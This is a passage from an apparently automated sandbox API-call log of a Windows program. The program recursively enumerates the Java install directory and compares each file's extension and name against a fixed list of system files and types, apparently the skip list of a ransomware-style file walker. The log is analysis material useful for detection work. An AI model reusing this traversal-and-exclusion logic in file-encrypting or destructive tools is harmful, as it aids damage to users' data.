0x2b6dc8 [0090.767] FindNextFileW (in: hFindFile=0x2b6dc8, lpFindFileData=0x19f650 | out: lpFindFileData=0x19f650) returned 1 [0090.767] FindNextFileW (in: hFindFile=0x2b6dc8, lpFindFileData=0x19f650 | out: lpFindFileData=0x19f650) returned 1 [0090.767] FindNextFileW (in: hFindFile=0x2b6dc8, lpFindFileData=0x19f650 | out: lpFindFileData=0x19f650) returned 1 [0090.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="INI", cchCount2=3) returned 1 [0090.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0090.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0090.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="INI", cchCount2=3) returned 1 [0090.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0090.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0090.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0090.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="INI", cchCount2=3) returned 1 [0090.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="INI", cchCount2=3) returned 1 [0090.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="INI", cchCount2=3) returned 1 [0090.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0090.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="INI", cchCount2=3) returned 3 [0090.768] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="INI", cchCount2=3) returned 3 [0090.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="INI", cchCount2=3) returned 3 [0090.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="INI", cchCount2=3) returned 3 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="INI", cchCount2=3) returned 3 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="INI", cchCount2=3) returned 3 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="DESKTOP.INI", cchCount2=11) returned 1 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="DESKTOP.INI", cchCount2=11) returned 1 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="DESKTOP.INI", cchCount2=11) returned 1 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0090.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="DESKTOP.INI", cchCount2=11) returned 3 [0090.803] FindNextFileW (in: hFindFile=0x2b6dc8, lpFindFileData=0x19f650 | out: lpFindFileData=0x19f650) returned 1 [0090.803] FindNextFileW (in: hFindFile=0x2b6dc8, lpFindFileData=0x19f650 | out: lpFindFileData=0x19f650) returned 1 [0090.803] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\*.*", lpFindFileData=0x19f360 | out: lpFindFileData=0x19f360) returned 0x2b6ec8 [0090.804] FindNextFileW (in: hFindFile=0x2b6ec8, lpFindFileData=0x19f360 | out: lpFindFileData=0x19f360) returned 1 [0090.804] FindNextFileW (in: hFindFile=0x2b6ec8, lpFindFileData=0x19f360 | out: lpFindFileData=0x19f360) returned 1 [0090.804] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\*.*", lpFindFileData=0x19f070 | out: lpFindFileData=0x19f070) returned 0x2b6f08 [0090.804] FindNextFileW (in: hFindFile=0x2b6f08, lpFindFileData=0x19f070 | out: lpFindFileData=0x19f070) returned 1 [0090.806] FindNextFileW (in: hFindFile=0x2b6f08, lpFindFileData=0x19f070 | out: lpFindFileData=0x19f070) returned 1 [0090.806] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\*.*", lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 0x2b6f48 [0090.911] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.911] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="DLL", cchCount2=3) returned 3 [0090.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 1 [0090.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="DLL", cchCount2=3) returned 2 [0090.911] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 1 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="DLL", cchCount2=3) returned 2 [0090.912] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 1 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="DLL", cchCount2=3) returned 2 [0090.912] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 1 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="DLL", cchCount2=3) returned 2 [0090.912] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="DLL", cchCount2=3) returned 3 [0090.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 1 [0090.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="DLL", cchCount2=3) returned 2 [0090.913] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.913] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\*.*", lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0x2b7008 [0090.956] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0090.956] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0090.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="DLL", cchCount2=3) returned 3 [0090.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 1 [0090.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="DLL", cchCount2=3) returned 2 [0090.956] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="DLL", cchCount2=3) returned 3 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 1 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="DLL", cchCount2=3) returned 2 [0090.963] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0 [0090.963] FindClose (in: hFindFile=0x2b7008 | out: hFindFile=0x2b7008) returned 1 [0090.963] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="DLL", cchCount2=3) returned 3 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 1 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="DLL", cchCount2=3) returned 2 [0090.964] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 1 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="DLL", cchCount2=3) returned 2 [0090.964] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 1 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="DLL", cchCount2=3) returned 2 [0090.964] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 1 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="DLL", cchCount2=3) returned 2 [0090.964] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="DLL", cchCount2=3) returned 3 [0090.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 1 [0090.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="DLL", cchCount2=3) returned 3 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.965] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.966] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.966] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.966] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.981] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.981] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.981] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW 